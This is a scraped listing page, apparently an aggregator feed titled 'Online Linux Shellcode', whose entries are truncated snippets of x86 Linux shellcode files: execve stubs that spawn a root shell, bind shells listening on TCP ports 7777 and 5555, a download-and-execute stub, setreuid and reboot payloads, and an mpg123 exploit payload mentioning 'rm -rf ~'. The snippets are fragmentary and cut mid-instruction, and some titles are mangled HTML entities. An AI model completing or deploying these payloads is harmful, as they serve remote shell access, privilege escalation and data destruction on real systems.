Online Linux Shellcode

Src

Online Linux Shellcode - 1 hour 2 min ago
... push ebx push edx push byte 104 pop eax int 0x80 listen: mov al, 106 int 0x80 accept: push edx push ebx %ifndef USE_SINGLE_STAGE mov dh, 0x10 %endif ...

execve.asm

Online Linux Shellcode - 1 hour 2 min ago
The following code was used to make the above shellcode. ... int 0x80 linux: push ebx mov ecx, esp mov al, 11 #11 syscall execve linux int 0x80 ...

exit.asm

Online Linux Shellcode - 1 hour 2 min ago
... Hanna ;shanna@uiuc.edu ;http://www.vividmachines.com/ ;Linux Shellcode ;exit.asm shellcode example ;this shellcode just calls sysexit [SECTION .text] ...

shellex.asm

Online Linux Shellcode - 1 hour 2 min ago
... Linux Shellcode ;shellex.asm shellcode example ;this shellcode fires ... [ebx+12] ;load the address of the NULLS int 0x80 ;call the kernel, WE HAVE A SHELL! ender: ...

coderunner.asm

Online Linux Shellcode - 1 hour 2 min ago
# this loads shellcode into mem. and executes it. # this prog is not ... int $0x80 cmp $0, %eax jb exit mov %eax, %edi # fd on EDI getsize: # get filesize mov ...

reboot.asm

Online Linux Shellcode - 1 hour 2 min ago
... movl $672274793,%ecx movl $0x1234567,%edx int $0x80 xorl %eax,%eax movb $0x01,%al int $0x80 */ char shellcode[]= "\xeb\x06\x5f\xe8\x05\x00 ...

shellex.asm

Online Linux Shellcode - 1 hour 2 min ago
... .edu ;http://www.vividmachines.com/ ;Linux Shellcode ;shellex.asm shellcode example ;this shellcode fires up a shell with root access [SECTION. ...

linux_download_exec.asm

Online Linux Shellcode - 1 hour 2 min ago
... eax inc eax xor ebx, ebx int 0x80 ; We can append the exit method ... to be sent to the remote server must be appended (NULL terminated) to ; the shellcode </pre></body></html> ...

&amp;amp;amp;amp;amp;lt;!DOCTYPE xhtml PUBLIC "-/W3C/DTD XHTML 1.0 ...

Online Linux Shellcode - 1 hour 2 min ago
... <html><head></head><body><pre>; ; Shellcode that binds to TCP port ... push esi xor eax, eax push eax mov eax, 0x68 int 0x80 ; Call listen() mov eax, 5 push eax push esi xor eax, ...

&amp;amp;amp;amp;lt;!DOCTYPE xhtml PUBLIC "-/W3C/DTD XHTML 1.0 ...

Online Linux Shellcode - 1 hour 2 min ago
... head><body><pre>; ; Shellcode that binds to TCP port 7777 and returns the string ... 0x66 int 0x80 ; Call close() mov ebx, edi mov eax, 0x6 int 0x80 jmp ...

setreuid_1-255.asm

Online Linux Shellcode - 1 hour 2 min ago
(linux)asm[setreuid(?,?)]: pre-made shellcode. by: vade79/v9[v9@fakehalo.org] . -CODE: since i did not see(i was looking) shellcode/asm for setreuid ...

shellcode.asm

Online Linux Shellcode - 1 hour 2 min ago
BITS 32 ;shellcode.asm xor eax,eax mov al,70 xor ebx,ebx xor ecx,ebx int 0x80 jmp short chaine ;jmp vers chaine qui est à moins de 256 octets retour: ...

exit.asm

Online Linux Shellcode - 1 hour 2 min ago
... .com/ ;Linux Shellcode ;exit.asm shellcode example ;this shellcode just calls sysexit [SECTION .text] global _start _start: xor ebx, ebx mov al, 1 ...

world.asm

Online Linux Shellcode - 1 hour 2 min ago
... shellcode for Linux ;Program by: lockdown (www.lockeddown.net) ;Date: March 28, ... The code below was used to make the above shellcode segment. ...

funny gobbles shellcode from mpg123 exploit

Online Linux Shellcode - 1 hour 2 min ago
... xc0\x40\xcd\x80&quot;; ; ; ; ; This shellcode ; ; 1) prints banner &quot;rm -rf ~ in 5 seconds. ... four 'A's) mov $0xb,%al int $0x80 ; execve(&quot;/bin/sh&quot; ...

BUBBLES.asm

Online Linux Shellcode - 1 hour 2 min ago
... atoiLoopOut inc edx jmp atoiLoop atoiLoopOut: mov esp, ebp pop ebp ret sub_Exit: mov eax, __NR_EXIT xor ebx, ebx int 0x80 </pre></body></html> ...

binary.asm

Online Linux Shellcode - 1 hour 2 min ago
... n@ry Sh3ll C0d3&quot; in Linux Assembly Language ; Assembler used: NASM ; ; ; Back2Track, as I always say: Linux rul3z ... ; Binary@linuxac. ...

Src

Online Linux Shellcode - 1 hour 2 min ago
... eax push eax push ecx push esi mov ecx, esp int 0x80 listen: mov al, 0x66 shl ebx, 1 int 0x80 accept: push edx push edx push esi inc ebx mov ecx, ...

linux/x86 listens for shellcode on tcp/5555 and jumps to it

Online Linux Shellcode - Sun, 09/05/2010 - 18:02
... eax, %ebx _read: mov $0x3, %al mov %esp, %ecx mov $0x7ff, %dx incb %dl int $0x80 jmp *%ecx /* Jump to our shellcode */ ; milw0rm.com [2009-09-09] ...

set-loop.asm

Online Linux Shellcode - Sat, 09/04/2010 - 17:02
Syndicate content